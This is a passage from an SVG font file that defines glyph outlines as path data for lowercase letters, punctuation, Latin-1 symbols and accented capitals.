<glyph unicode="d" d="M98 500v21q0 261 111.5 421t312.5 160q95 0 168.5 -35t125.5 -102v595h197v-1560h-161l-23 133q-53 -76 -130 -115t-179 -39q-198 0 -310 143.5t-112 377.5zM295 500q0 -164 67 -262.5t208 -98.5q88 0 148 40t98 112v505q-38 67 -98.5 106.5t-145.5 39.5 q-142 0 -209.5 -117t-67.5 -304v-21z" />
<glyph unicode="e" horiz-adv-x="1083" d="M99 520v44q0 231 137.5 384.5t325.5 153.5q219 0 331 -132t112 -352v-123h-702l-3 -5q3 -156 79 -256.5t213 -100.5q100 0 175.5 28.5t130.5 78.5l77 -128q-58 -57 -153 -95t-230 -38q-226 0 -359.5 150.5t-133.5 390.5zM307 654l2 -5h499v26q0 116 -62 194t-184 78 q-99 0 -169 -83.5t-86 -209.5z" />
<glyph unicode="f" horiz-adv-x="707" d="M56 936v146h169v137q0 173 90.5 267.5t252.5 94.5q34 0 68.5 -5.5t76.5 -15.5l-24 -150q-18 4 -43.5 7t-53.5 3q-86 0 -128 -51.5t-42 -149.5v-137h225v-146h-225v-936h-197v936h-169z" />
<glyph unicode="g" d="M100 500v21q0 261 114 421t315 160q103 0 181 -41.5t130 -119.5l24 141h157v-1088q0 -208 -121 -319.5t-349 -111.5q-78 0 -168.5 21.5t-159.5 58.5l50 153q53 -30 128 -48.5t148 -18.5q144 0 209.5 65.5t65.5 199.5v122q-53 -68 -127 -102.5t-170 -34.5q-199 0 -313 144 t-114 377zM297 500q0 -163 69 -262t210 -99q89 0 149 40.5t99 114.5v498q-38 69 -99 109.5t-147 40.5q-141 0 -211 -118t-70 -303v-21z" />
<glyph unicode="h" d="M143 0v1560h197v-623q56 78 137.5 121.5t180.5 43.5q173 0 269.5 -104t96.5 -320v-678h-197v680q0 134 -57.5 198t-171.5 64q-82 0 -148.5 -38.5t-109.5 -104.5v-799h-197z" />
<glyph unicode="i" horiz-adv-x="516" d="M159 0v1082h197v-1082h-197zM159 1359v201h197v-201h-197z" />
<glyph unicode="j" horiz-adv-x="530" d="M-66 -419l14 155q14 -5 40 -8.5t43 -3.5q65 0 103.5 44t38.5 143v1171h197v-1171q0 -167 -86 -257.5t-239 -90.5q-31 0 -56.5 4.5t-54.5 13.5zM167 1363v197h197v-197h-197z" />
<glyph unicode="k" horiz-adv-x="1050" d="M144 0v1560h197v-904h126l296 426h236l-370 -492l423 -590h-232l-351 499h-128v-499h-197z" />
<glyph unicode="l" horiz-adv-x="516" d="M159 0v1560h197v-1560h-197z" />
<glyph unicode="m" horiz-adv-x="1790" d="M143 0v1082h176l14 -142q53 77 134.5 119.5t189.5 42.5t185.5 -50t116.5 -150q51 92 135 146t196 54q165 0 261 -113.5t96 -341.5v-647h-197v649q0 160 -55 226.5t-164 66.5q-101 0 -163.5 -70t-73.5 -177v-8v-687h-198v649q0 152 -56.5 222.5t-162.5 70.5 q-90 0 -148 -37t-89 -104v-801h-197z" />
<glyph unicode="n" d="M143 0v1082h176l14 -161q54 86 135.5 133.5t185.5 47.5q175 0 271 -102.5t96 -316.5v-683h-197v679q0 143 -56.5 203t-172.5 60q-85 0 -150.5 -41t-104.5 -112v-789h-197z" />
<glyph unicode="o" d="M97 529v22q0 240 130 395.5t353 155.5q225 0 355.5 -155t130.5 -396v-22q0 -242 -130 -396t-354 -154t-354.5 154.5t-130.5 395.5zM294 529q0 -172 72.5 -284t215.5 -112q141 0 214 112t73 284v22q0 170 -73.5 283t-215.5 113q-141 0 -213.5 -113t-72.5 -283v-22z" />
<glyph unicode="p" d="M143 -416v1498h151l31 -140q53 78 132 119t184 41q201 0 312.5 -159.5t111.5 -421.5v-21q0 -234 -112 -377.5t-309 -143.5q-100 0 -175.5 33.5t-128.5 100.5v-529h-197zM340 275q37 -67 97 -104.5t147 -37.5q140 0 212 102.5t72 264.5v21q0 184 -72.5 302.5t-213.5 118.5 q-85 0 -145 -38.5t-97 -105.5v-523z" />
<glyph unicode="q" d="M98 500v21q0 261 111.5 421t312.5 160q99 0 174 -37.5t127 -109.5l29 127h150v-1498h-197v518q-52 -61 -123 -92t-162 -31q-198 0 -310 143.5t-112 377.5zM295 500q0 -164 67.5 -265.5t207.5 -101.5q81 0 138.5 36t96.5 101v546q-39 61 -96.5 96t-136.5 35 q-141 0 -209 -119.5t-68 -306.5v-21z" />
<glyph unicode="r" horiz-adv-x="702" d="M143 0v1082h176l19 -158q46 84 113.5 131t155.5 47q22 0 42 -3.5t33 -7.5l-27 -183l-101 6q-78 0 -131.5 -37t-82.5 -104v-773h-197z" />
<glyph unicode="s" horiz-adv-x="1071" d="M109 329l2 6h188q5 -105 78 -153.5t171 -48.5q105 0 164.5 42.5t59.5 111.5q0 65 -49.5 107t-187.5 73q-197 43 -296.5 116.5t-99.5 200.5q0 132 112 225t292 93q189 0 301 -97q107 -93 106 -224v-12l-2 -6h-188q0 71 -59.5 127.5t-157.5 56.5q-105 0 -156 -46t-51 -111 q0 -64 45 -101t183 -66q205 -44 305 -119.5t100 -202.5q0 -144 -116.5 -233t-304.5 -89q-207 0 -326 105q-113 100 -113 232v13z" />
<glyph unicode="t" horiz-adv-x="708" d="M34 936v146h172v261h197v-261h205v-146h-205v-657q0 -76 31.5 -107t83.5 -31q17 0 37.5 4t36.5 10l26 -135q-22 -18 -64.5 -29.5t-85.5 -11.5q-120 0 -191 72.5t-71 227.5v657h-172z" />
<glyph unicode="u" d="M139 444v638h197v-640q0 -173 51 -238t159 -65q105 0 173.5 42.5t103.5 120.5v780h197v-1082h-177l-13 160q-51 -87 -131 -134t-185 -47q-177 0 -276 113t-99 352z" />
<glyph unicode="v" horiz-adv-x="1030" d="M46 1082h202l256 -763l17 -76h6l19 76l249 763h201l-398 -1082h-149z" />
<glyph unicode="w" horiz-adv-x="1550" d="M45 1082h196l179 -688l23 -131h6l28 131l216 688h158l217 -688l31 -146h6l29 146l170 688h196l-314 -1082h-159l-209 659l-45 184l-6 -1l-43 -183l-206 -659h-159z" />
<glyph unicode="x" horiz-adv-x="1030" d="M46 0l361 547l-351 535h227l227 -399l230 399h230l-351 -535l361 -547h-226l-240 409l-240 -409h-228z" />
<glyph unicode="y" horiz-adv-x="1030" d="M26 1082h220l228 -681l35 -136h6l266 817h219l-455 -1248q-41 -109 -117.5 -190t-206.5 -81q-24 0 -61 5.5t-57 10.5l20 155q-6 1 35.5 -2t52.5 -3q63 0 103 56t67 124l47 113z" />
<glyph unicode="z" horiz-adv-x="1030" d="M94 0v138l585 788h-578v156h819v-134l-591 -794h625v-154h-860z" />
<glyph unicode="{" horiz-adv-x="696" d="M63 543v147q106 0 157.5 61.5t51.5 174.5v206q0 171 82 290.5t277 174.5l40 -117q-110 -35 -156 -125.5t-46 -222.5v-206q0 -105 -42.5 -185t-127.5 -125q85 -46 127.5 -126.5t42.5 -183.5v-205q0 -132 46 -221.5t156 -125.5l-40 -118q-195 55 -277 175t-82 290v205 q0 112 -51.5 174.5t-157.5 62.5z" />
<glyph unicode="|" horiz-adv-x="507" d="M175 -270v1726h158v-1726h-158z" />
<glyph unicode="}" horiz-adv-x="696" d="M21 -246q109 36 156 125.5t47 221.5v205q0 107 45 187t139 123q-94 41 -139 121t-45 189v206q0 132 -47 222.5t-156 125.5l41 117q194 -55 276.5 -174.5t82.5 -290.5v-206q0 -113 50.5 -174.5t158.5 -61.5v-147q-108 0 -158.5 -62.5t-50.5 -174.5v-205q0 -170 -82.5 -290 t-276.5 -175z" />
<glyph unicode="~" horiz-adv-x="1391" d="M128 474q0 136 85.5 232.5t217.5 96.5q88 0 163 -34.5t160 -104.5q58 -51 106 -74t100 -23q66 0 114.5 57t48.5 134l141 -18q0 -137 -87 -238t-217 -101q-90 0 -163.5 33t-158.5 107q-59 48 -108 72t-99 24q-67 0 -114.5 -53t-47.5 -128z" />
<glyph unicode="&#xa1;" horiz-adv-x="507" d="M144 -374v978h197v-978h-197zM144 876v206h197v-206h-197z" />
<glyph unicode="&#xa2;" horiz-adv-x="1122" d="M107 520v42q0 199 95 344.5t276 183.5v228h198v-223q157 -24 252.5 -130.5t92.5 -250.5l-2 -5h-179q0 99 -70 168.5t-177 69.5q-155 0 -221.5 -111.5t-66.5 -273.5v-42q0 -166 66 -276.5t222 -110.5q98 0 172.5 60.5t74.5 148.5h178l3 -6q3 -122 -98 -223t-247 -126v-232 h-198v236q-182 36 -276.5 182t-94.5 347z" />
<glyph unicode="&#xa3;" horiz-adv-x="1194" d="M70 615v155h158l-10 270q0 204 112 320.5t300 116.5q200 0 310 -104.5t106 -276.5l-2 -6h-190q0 118 -63 175t-161 57q-99 0 -157 -74.5t-58 -207.5l10 -270h418v-155h-413l6 -149q0 -90 -15.5 -171.5t-44.5 -140.5h735l-1 -154h-976v154h10q48 13 72 111t24 201l-6 149 h-164z" />
<glyph unicode="&#xa4;" horiz-adv-x="1456" d="M104 112l138 140q-50 76 -76.5 166.5t-26.5 189.5q0 102 28.5 196t82.5 172l-146 149l139 139l143 -146q74 55 163 85.5t185 30.5q97 0 186 -31t164 -87l146 149l140 -140l-150 -153q52 -78 80.5 -170.5t28.5 -193.5q0 -98 -26.5 -187.5t-74.5 -165.5l142 -143l-140 -139 l-133 135q-77 -62 -169.5 -95t-193.5 -33t-193.5 32.5t-167.5 93.5l-130 -132zM321 608q0 -188 120.5 -320.5t292.5 -132.5q170 0 290.5 132.5t120.5 320.5q0 186 -120.5 318t-290.5 132q-172 0 -292.5 -132t-120.5 -318z" />
<glyph unicode="&#xa5;" horiz-adv-x="1243" d="M30 1456h226l359 -663l360 663h224l-418 -718h312v-155h-383v-135h383v-155h-383v-293h-197v293h-375v155h375v135h-375v155h311z" />
<glyph unicode="&#xa6;" horiz-adv-x="499" d="M145 -270v792h197v-792h-197zM145 698v758h197v-758h-197z" />
<glyph unicode="&#xa7;" horiz-adv-x="1259" d="M94 551q0 91 47 161.5t134 111.5q-68 50 -102 119.5t-34 166.5q0 166 134 266.5t358 100.5q233 0 363 -111.5t126 -313.5l-3 -6h-188q0 118 -79 197t-219 79q-145 0 -220 -59.5t-75 -150.5q0 -99 67 -148.5t278 -107.5q244 -69 355.5 -159.5t111.5 -265.5q0 -94 -48 -164 t-135 -110q69 -51 104 -119t35 -166q0 -172 -133 -269.5t-358 -97.5q-221 0 -372 102.5t-146 322.5l2 6l188 2q0 -143 96.5 -210.5t231.5 -67.5q137 0 215.5 59.5t78.5 150.5t-72 141.5t-276 113.5q-239 63 -352 156t-113 270zM291 553q0 -100 68 -151.5t278 -110.5 q56 -17 93 -28t70 -23q72 20 112 69.5t40 118.5q0 91 -73.5 144.5t-275.5 116.5q-47 12 -88.5 24.5t-77.5 27.5q-73 -19 -109.5 -69t-36.5 -119z" />
<glyph unicode="&#xa8;" horiz-adv-x="1021" d="M170 1256v200h219v-200h-219zM640 1256v200h219v-200h-219z" />
<glyph unicode="&#xa9;" horiz-adv-x="1604" d="M88 729q0 315 207 531t503 216q295 0 502 -216t207 -531q0 -316 -207.5 -533t-501.5 -217q-296 0 -503 217t-207 533zM209 729q0 -265 171.5 -447t417.5 -182q245 0 417 182t172 447q0 263 -172 444t-417 181q-246 0 -417.5 -181t-171.5 -444zM436 669v119q0 173 94 280 t254 107q157 0 245.5 -79t84.5 -228l-2 -6h-146q0 95 -45.5 138.5t-136.5 43.5q-94 0 -145 -70.5t-51 -184.5v-120q0 -117 51 -187t145 -70q91 0 136 43t45 141h146l2 -6q4 -151 -84 -229.5t-245 -78.5q-160 0 -254 106.5t-94 280.5z" />
<glyph unicode="&#xaa;" horiz-adv-x="917" d="M120 920q0 110 84.5 170t245.5 60h139v52q0 63 -30 97t-88 34q-67 0 -103.5 -27t-36.5 -76l-162 13l-1 6q-6 98 78.5 163t224.5 65q134 0 212 -71t78 -205v-314q0 -50 6 -94t20 -87h-174q-8 21 -13 45t-8 50q-33 -47 -89.5 -78t-133.5 -31q-119 0 -184 61t-65 167z M293 924q0 -45 29 -69t89 -24q51 0 105.5 30t72.5 65v110h-138q-75 0 -116.5 -33t-41.5 -79z" />
<glyph unicode="&#xab;" horiz-adv-x="966" d="M98 507v19l295 389h148l-255 -399l255 -398h-148zM432 507v19l295 389h148l-255 -399l255 -398h-148z" />
<glyph unicode="&#xac;" horiz-adv-x="1137" d="M127 637v165h835v-427h-198v262h-637z" />
<glyph unicode="&#xad;" horiz-adv-x="561" d="M35 538v154h490v-154h-490z" />
<glyph unicode="&#xae;" horiz-adv-x="1604" d="M88 729q0 315 207 531t503 216q295 0 502 -216t207 -531q0 -316 -207.5 -533t-501.5 -217q-296 0 -503 217t-207 533zM209 729q0 -266 171.5 -447.5t417.5 -181.5q244 0 416 182t172 447q0 264 -171.5 444.5t-416.5 180.5q-246 0 -417.5 -180.5t-171.5 -444.5zM504 316 v850h280q152 0 238.5 -65.5t86.5 -191.5q0 -62 -33 -109t-96 -78q66 -26 95.5 -79t29.5 -128v-56q0 -41 3.5 -73.5t13.5 -53.5v-16h-153q-9 21 -11 61.5t-2 82.5v54q0 72 -33.5 106t-110.5 34h-159v-338h-149zM653 784h152q65 1 110.5 32.5t45.5 87.5q0 73 -39.5 102.5 t-137.5 29.5h-131v-252z" />
<glyph unicode="&#xaf;" horiz-adv-x="950" d="M123 1310v146h721v-146h-721z" />
<glyph unicode="&#xb0;" horiz-adv-x="763" d="M128 1216q0 106 76 183.5t181 77.5q103 0 177.5 -77.5t74.5 -183.5q0 -108 -74 -182.5t-178 -74.5q-106 0 -181.5 74.5t-75.5 182.5zM259 1216q0 -55 36.5 -91t89.5 -36q52 0 87.5 36t35.5 91t-36 92.5t-87 37.5q-53 0 -89.5 -37.5t-36.5 -92.5z" />
<glyph unicode="&#xb1;" horiz-adv-x="1097" d="M99 702v154h381v411h177v-411h358v-154h-358v-413h-177v413h-381zM136 4v155h835v-155h-835z" />
<glyph unicode="&#xb2;" horiz-adv-x="868" d="M119 1240q-6 99 78 169t225 70q135 0 211 -64t76 -180q0 -80 -44.5 -136t-160.5 -161l-153 -135l2 -6h361v-130h-592v130l302 262q69 60 91 97.5t22 79.5q0 50 -28.5 81t-86.5 31q-67 0 -103.5 -32t-36.5 -82h-161z" />
<glyph unicode="&#xb3;" horiz-adv-x="876" d="M112 882l1 6h163q0 -46 37.5 -74.5t100.5 -28.5q72 0 114 29.5t42 77.5q0 62 -36.5 90.5t-109.5 28.5h-132v126h132q67 0 99.5 28.5t32.5 80.5q0 43 -36.5 72t-105.5 29q-56 0 -90.5 -24t-34.5 -64h-162l-2 6q-6 94 78.5 153.5t210.5 59.5q145 0 229 -59.5t84 -169.5 q0 -55 -35.5 -100.5t-97.5 -71.5q70 -23 108 -71t38 -116q0 -111 -90 -173t-236 -62q-127 0 -217.5 58t-84.5 169z" />
<glyph unicode="&#xb4;" horiz-adv-x="654" d="M131 1211l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xb5;" d="M153 -416v1498h196v-642q2 -178 57.5 -242.5t155.5 -64.5q98 0 158.5 36t92.5 106v807h197v-1082h-177l-9 108q-44 -63 -107.5 -96t-146.5 -33q-72 0 -126.5 16.5t-94.5 51.5v-463h-196z" />
<glyph unicode="&#xb6;" horiz-adv-x="1006" d="M63 988q0 207 129.5 337.5t362.5 130.5h281v-1456h-197v520h-84q-233 0 -362.5 129.5t-129.5 338.5z" />
<glyph unicode="&#xb7;" horiz-adv-x="540" d="M161 624v212h198v-212h-198z" />
<glyph unicode="&#xb8;" horiz-adv-x="509" d="M119 -326q72 0 116 24.5t44 73.5q0 48 -36 67t-123 26l32 135h140l-12 -52q65 -11 108 -52t43 -121q0 -96 -79 -153t-226 -57z" />
<glyph unicode="&#xb9;" horiz-adv-x="557" d="M95 1320v134l301 23v-812h-174v655h-127z" />
<glyph unicode="&#xba;" horiz-adv-x="933" d="M120 1025v117q0 148 94 241.5t251 93.5q158 0 252 -93.5t94 -241.5v-117q0 -149 -93.5 -241.5t-250.5 -92.5q-158 0 -252.5 92.5t-94.5 241.5zM293 1025q0 -88 44 -140.5t130 -52.5q83 0 127.5 53t44.5 140v117q0 84 -45 137.5t-129 53.5t-128 -53.5t-44 -137.5v-117z " />
<glyph unicode="&#xbb;" horiz-adv-x="966" d="M110 152l255 398l-255 399h148l295 -389v-19l-295 -389h-148zM456 152l255 398l-255 399h148l295 -389v-19l-295 -389h-148z" />
<glyph unicode="&#xbc;" horiz-adv-x="1595" d="M184 1319v134l301 23v-812h-174v655h-127zM339 185l711 1138l109 -67l-711 -1138zM785 254l422 547h173v-519h126v-130h-126v-152h-170v152h-417zM967 282h243v310l-6 1l-13 -22z" />
<glyph unicode="&#xbd;" horiz-adv-x="1708" d="M184 1319v134l301 23v-812h-174v655h-127zM352 185l711 1138l109 -67l-711 -1138zM930 573q-6 99 78 169t225 70q135 0 211 -64t76 -180q0 -80 -44.5 -136t-160.5 -161l-153 -135l2 -6h361v-130h-592v130l302 262q69 60 91 97.5t22 79.5q0 50 -28.5 81t-86.5 31 q-67 0 -103.5 -32t-36.5 -82h-161z" />
<glyph unicode="&#xbe;" horiz-adv-x="1781" d="M128 883l1 6h163q0 -46 37.5 -74.5t100.5 -28.5q72 0 114 29.5t42 77.5q0 62 -36.5 90.5t-109.5 28.5h-132v126h132q67 0 99.5 28.5t32.5 80.5q0 43 -36.5 72t-105.5 29q-56 0 -90.5 -24t-34.5 -64h-162l-2 6q-6 94 78.5 153.5t210.5 59.5q145 0 229 -59.5t84 -169.5 q0 -55 -35.5 -100.5t-97.5 -71.5q70 -23 108 -71t38 -116q0 -111 -90 -173t-236 -62q-127 0 -217.5 58t-84.5 169zM522 185l711 1138l109 -67l-711 -1138zM974 254l422 547h173v-519h126v-130h-126v-152h-170v152h-417zM1156 282h243v310l-6 1l-13 -22z" />
<glyph unicode="&#xbf;" horiz-adv-x="1013" d="M114 -13q0 127 70 233.5t187 220.5q53 53 65 96t12 135h197q-2 -146 -26 -202t-125 -147q-100 -118 -141.5 -181t-41.5 -150q0 -106 56 -163t162 -57q90 0 154.5 49.5t64.5 145.5h188l3 -6q2 -161 -114.5 -258t-295.5 -97q-198 0 -306.5 100.5t-108.5 280.5zM441 874v209 h206v-209h-206z" />
<glyph unicode="&#xc0;" horiz-adv-x="1326" d="M20 0l563 1456h169l554 -1456h-201l-136 375h-610l-138 -375h-201zM378 1820l3 6h230l175 -266h-158zM420 540h490l-240 663h-6z" />
<glyph unicode="&#xc1;" horiz-adv-x="1326" d="M20 0l563 1456h169l554 -1456h-201l-136 375h-610l-138 -375h-201zM420 540h490l-240 663h-6zM613 1556l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xc2;" horiz-adv-x="1326" d="M20 0l563 1456h169l554 -1456h-201l-136 375h-610l-138 -375h-201zM356 1601v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160zM420 540h490l-240 663h-6z" />
<glyph unicode="&#xc3;" horiz-adv-x="1326" d="M20 0l563 1456h169l554 -1456h-201l-136 375h-610l-138 -375h-201zM316 1628q0 93 59 161.5t150 68.5q56 0 140 -47t136 -47q41 0 71 32.5t30 79.5l108 -32q0 -94 -59.5 -159t-149.5 -65q-71 0 -148 46.5t-128 46.5q-43 0 -72 -32.5t-29 -78.5zM420 540h490l-240 663h-6z " />
<glyph unicode="&#xc4;" horiz-adv-x="1326" d="M20 0l563 1456h169l554 -1456h-201l-136 375h-610l-138 -375h-201zM319 1605v200h219v-200h-219zM420 540h490l-240 663h-6zM789 1605v200h219v-200h-219z" />
<glyph unicode="&#xc5;" horiz-adv-x="1326" d="M20 0l563 1456h169l554 -1456h-201l-136 375h-610l-138 -375h-201zM420 540h490l-240 663h-6zM457 1734q0 84 60.5 141t147.5 57q85 0 145 -56.5t60 -141.5q0 -86 -59.5 -140t-145.5 -54q-87 0 -147.5 54t-60.5 140zM560 1734q0 -43 31 -73.5t74 -30.5q42 0 72 29.5 t30 74.5t-30 76t-72 31q-43 0 -74 -31t-31 -76z" />
<glyph unicode="&#xc6;" horiz-adv-x="1922" d="M-20 0l880 1456h967v-155h-691l20 -466h590v-155h-584l22 -526h705v-154h-895l-15 350h-557l-202 -350h-240zM525 529h447l-31 710l-5 2z" />
<glyph unicode="&#xc7;" horiz-adv-x="1297" d="M118 598v259q0 269 155.5 444.5t402.5 175.5t393 -131.5t142 -348.5l-2 -6h-189q0 153 -90 242t-254 89q-165 0 -263 -133t-98 -330v-261q0 -199 98 -332t263 -133q164 0 254 88.5t90 244.5h189l2 -6q4 -205 -144 -343t-391 -138q-247 0 -402.5 175t-155.5 444zM581 -334 q72 0 116 24.5t44 73.5q0 48 -36 67t-123 26l32 135h140l-12 -52q65 -11 108 -52t43 -121q0 -96 -79 -153t-226 -57z" />
<glyph unicode="&#xc8;" horiz-adv-x="1197" d="M180 0v1456h955v-155h-758v-471h667v-155h-667v-521h769v-154h-966zM303 1820l3 6h230l175 -266h-158z" />
<glyph unicode="&#xc9;" horiz-adv-x="1197" d="M180 0v1456h955v-155h-758v-471h667v-155h-667v-521h769v-154h-966zM538 1556l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xca;" horiz-adv-x="1197" d="M180 0v1456h955v-155h-758v-471h667v-155h-667v-521h769v-154h-966zM322 1601v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160z" />
<glyph unicode="&#xcb;" horiz-adv-x="1197" d="M180 0v1456h955v-155h-758v-471h667v-155h-667v-521h769v-154h-966zM284 1605v200h219v-200h-219zM754 1605v200h219v-200h-219z" />
<glyph unicode="&#xcc;" horiz-adv-x="579" d="M-34 1820l3 6h230l175 -266h-158zM190 0v1456h198v-1456h-198z" />
<glyph unicode="&#xcd;" horiz-adv-x="579" d="M190 0v1456h198v-1456h-198zM199 1556l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xce;" horiz-adv-x="579" d="M-15 1601v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160zM190 0v1456h198v-1456h-198z" />
<glyph unicode="&#xcf;" horiz-adv-x="579" d="M-53 1605v200h219v-200h-219zM190 0v1456h198v-1456h-198zM417 1605v200h219v-200h-219z" />
<glyph unicode="&#xd0;" horiz-adv-x="1379" d="M42 663v155h168v638h447q286 0 459 -175.5t173 -453.5v-199q0 -279 -173 -453.5t-459 -174.5h-447v663h-168zM407 154h250q202 0 318.5 133t116.5 341v201q0 206 -116.5 339t-318.5 133h-250v-483h276v-155h-276v-509z" />
<glyph unicode="&#xd1;" horiz-adv-x="1461" d="M180 0v1456h197l701 -1124l6 2v1122h197v-1456h-197l-701 1126l-6 -2v-1124h-197zM381 1628q0 93 59 161.5t150 68.5q56 0 140 -47t136 -47q41 0 71 32.5t30 79.5l108 -32q0 -94 -59.5 -159t-149.5 -65q-71 0 -148 46.5t-128 46.5q-43 0 -72 -32.5t-29 -78.5z" />
<glyph unicode="&#xd2;" horiz-adv-x="1396" d="M113 598v259q0 266 159.5 443t414.5 177q264 0 429.5 -176.5t165.5 -443.5v-259q0 -267 -165.5 -443t-429.5 -176q-255 0 -414.5 176t-159.5 443zM310 598q0 -202 102.5 -330t274.5 -128q183 0 290.5 127.5t107.5 330.5v261q0 200 -108 328t-290 128q-172 0 -274.5 -128 t-102.5 -328v-261zM373 1841l3 6h230l175 -266h-158z" />
<glyph unicode="&#xd3;" horiz-adv-x="1396" d="M113 598v259q0 266 159.5 443t414.5 177q264 0 429.5 -176.5t165.5 -443.5v-259q0 -267 -165.5 -443t-429.5 -176q-255 0 -414.5 176t-159.5 443zM310 598q0 -202 102.5 -330t274.5 -128q183 0 290.5 127.5t107.5 330.5v261q0 200 -108 328t-290 128q-172 0 -274.5 -128 t-102.5 -328v-261zM608 1577l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xd4;" horiz-adv-x="1396" d="M113 598v259q0 266 159.5 443t414.5 177q264 0 429.5 -176.5t165.5 -443.5v-259q0 -267 -165.5 -443t-429.5 -176q-255 0 -414.5 176t-159.5 443zM310 598q0 -202 102.5 -330t274.5 -128q183 0 290.5 127.5t107.5 330.5v261q0 200 -108 328t-290 128q-172 0 -274.5 -128 t-102.5 -328v-261zM392 1622v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160z" />
<glyph unicode="&#xd5;" horiz-adv-x="1396" d="M113 598v259q0 266 159.5 443t414.5 177q264 0 429.5 -176.5t165.5 -443.5v-259q0 -267 -165.5 -443t-429.5 -176q-255 0 -414.5 176t-159.5 443zM310 598q0 -202 102.5 -330t274.5 -128q183 0 290.5 127.5t107.5 330.5v261q0 200 -108 328t-290 128q-172 0 -274.5 -128 t-102.5 -328v-261zM351 1649q0 93 59 161.5t150 68.5q56 0 140 -47t136 -47q41 0 71 32.5t30 79.5l108 -32q0 -94 -59.5 -159t-149.5 -65q-71 0 -148 46.5t-128 46.5q-43 0 -72 -32.5t-29 -78.5z" />
<glyph unicode="&#xd6;" horiz-adv-x="1396" d="M113 598v259q0 266 159.5 443t414.5 177q264 0 429.5 -176.5t165.5 -443.5v-259q0 -267 -165.5 -443t-429.5 -176q-255 0 -414.5 176t-159.5 443zM310 598q0 -202 102.5 -330t274.5 -128q183 0 290.5 127.5t107.5 330.5v261q0 200 -108 328t-290 128q-172 0 -274.5 -128 t-102.5 -328v-261zM354 1626v200h219v-200h-219zM824 1626v200h219v-200h-219z" />
<glyph unicode="&#xd7;" horiz-adv-x="1096" d="M88 351l327 334l-327 334l126 126l326 -333l327 333l126 -126l-328 -334l328 -334l-126 -126l-327 332l-326 -332z" />
<glyph unicode="&#xd8;" horiz-adv-x="1396" d="M113 598v259q0 266 159.5 443t414.5 177q94 0 178.5 -25.5t156.5 -71.5l81 137h149l-132 -221q77 -84 119.5 -197t42.5 -242v-259q0 -267 -165.5 -443t-429.5 -176q-85 0 -160.5 20.5t-139.5 60.5l-91 -154h-149l139 234q-84 84 -128.5 202t-44.5 256zM310 598 q0 -85 19 -158t54 -125l6 -1l544 916q-50 41 -112 63t-134 22q-172 0 -274.5 -128t-102.5 -328v-261zM475 208q44 -34 97 -51t115 -17q183 0 290.5 127.5t107.5 330.5v261q0 75 -16.5 142t-46.5 117l-6 1z" />
<glyph unicode="&#xd9;" horiz-adv-x="1386" d="M147 469v987h197v-987q0 -165 94 -250.5t248 -85.5q162 0 261.5 85.5t99.5 250.5v987h197v-987q0 -238 -154.5 -364t-403.5 -126q-240 0 -389.5 126.5t-149.5 363.5zM372 1820l3 6h230l175 -266h-158z" />
<glyph unicode="&#xda;" horiz-adv-x="1386" d="M147 469v987h197v-987q0 -165 94 -250.5t248 -85.5q162 0 261.5 85.5t99.5 250.5v987h197v-987q0 -238 -154.5 -364t-403.5 -126q-240 0 -389.5 126.5t-149.5 363.5zM607 1556l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xdb;" horiz-adv-x="1386" d="M147 469v987h197v-987q0 -165 94 -250.5t248 -85.5q162 0 261.5 85.5t99.5 250.5v987h197v-987q0 -238 -154.5 -364t-403.5 -126q-240 0 -389.5 126.5t-149.5 363.5zM391 1601v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160z" />
<glyph unicode="&#xdc;" horiz-adv-x="1386" d="M147 469v987h197v-987q0 -165 94 -250.5t248 -85.5q162 0 261.5 85.5t99.5 250.5v987h197v-987q0 -238 -154.5 -364t-403.5 -126q-240 0 -389.5 126.5t-149.5 363.5zM353 1605v200h219v-200h-219zM823 1605v200h219v-200h-219z" />
<glyph unicode="&#xdd;" horiz-adv-x="1250" d="M20 1456h225l380 -740l380 740h225l-511 -944v-512h-196v525zM535 1555l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xde;" horiz-adv-x="1209" d="M163 0v1456h197v-293h269q232 0 362 -118t130 -307q0 -190 -130 -307.5t-362 -117.5h-269v-313h-197zM360 467h269q147 0 220.5 78t73.5 191q0 114 -73.5 193.5t-220.5 79.5h-269v-542z" />
<glyph unicode="&#xdf;" horiz-adv-x="1221" d="M137 0v1082q0 223 117.5 348t300.5 125q161 0 262 -86t101 -253q0 -118 -64.5 -228t-64.5 -167q0 -82 173.5 -224t173.5 -281q0 -167 -104.5 -252t-282.5 -85q-84 0 -172.5 20.5t-125.5 50.5l44 159q43 -28 108 -52t126 -24q108 0 159 47.5t51 125.5q0 84 -173.5 227.5 t-173.5 289.5q0 80 70.5 190.5t70.5 186.5q0 93 -51 147t-117 54q-104 0 -168 -83.5t-64 -235.5v-1082h-196z" />
<glyph unicode="&#xe0;" horiz-adv-x="1126" d="M106 304q0 155 125.5 242.5t340.5 87.5h214v107q0 95 -58 150.5t-164 55.5q-95 0 -154.5 -48.5t-59.5 -116.5h-188l-2 6q-6 118 111.5 216t303.5 98q184 0 296 -93.5t112 -269.5v-521q0 -58 6 -112t22 -106h-203q-10 49 -15.5 86.5t-6.5 75.5q-55 -78 -143.5 -130.5 t-190.5 -52.5q-169 0 -257.5 86.5t-88.5 238.5zM230 1498l3 6h230l175 -266h-158zM303 300q0 -72 45 -114t133 -42q107 0 193 55t112 126v176h-221q-119 0 -190.5 -60t-71.5 -141z" />
<glyph unicode="&#xe1;" horiz-adv-x="1126" d="M106 304q0 155 125.5 242.5t340.5 87.5h214v107q0 95 -58 150.5t-164 55.5q-95 0 -154.5 -48.5t-59.5 -116.5h-188l-2 6q-6 118 111.5 216t303.5 98q184 0 296 -93.5t112 -269.5v-521q0 -58 6 -112t22 -106h-203q-10 49 -15.5 86.5t-6.5 75.5q-55 -78 -143.5 -130.5 t-190.5 -52.5q-169 0 -257.5 86.5t-88.5 238.5zM303 300q0 -72 45 -114t133 -42q107 0 193 55t112 126v176h-221q-119 0 -190.5 -60t-71.5 -141zM465 1234l185 266h230l2 -6l-270 -260h-147z" />
